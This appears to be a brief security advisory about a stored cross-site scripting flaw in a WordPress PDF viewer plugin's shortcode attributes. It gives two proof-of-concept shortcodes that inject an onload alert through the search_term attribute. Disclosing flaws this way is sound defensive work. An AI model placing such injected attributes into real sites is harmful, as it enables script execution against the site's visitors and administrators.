The plugin does not escape some of its shortcode and Gutenberg Block attributes, which could allow users with a role as low as Contributor to to perform Cross-Site Scripting attacks
[pdfjs-viewer search_term=‘" onload="alert(/XSS/)’]
[pdfjs-viewer viewer_width=0 viewer_height=800 url=undefined download=true print=true fullscreen=false fullscreen_target=false fullscreen_text=“on” zoom=0 search_term=‘" onload="alert(/XSS/)’ ]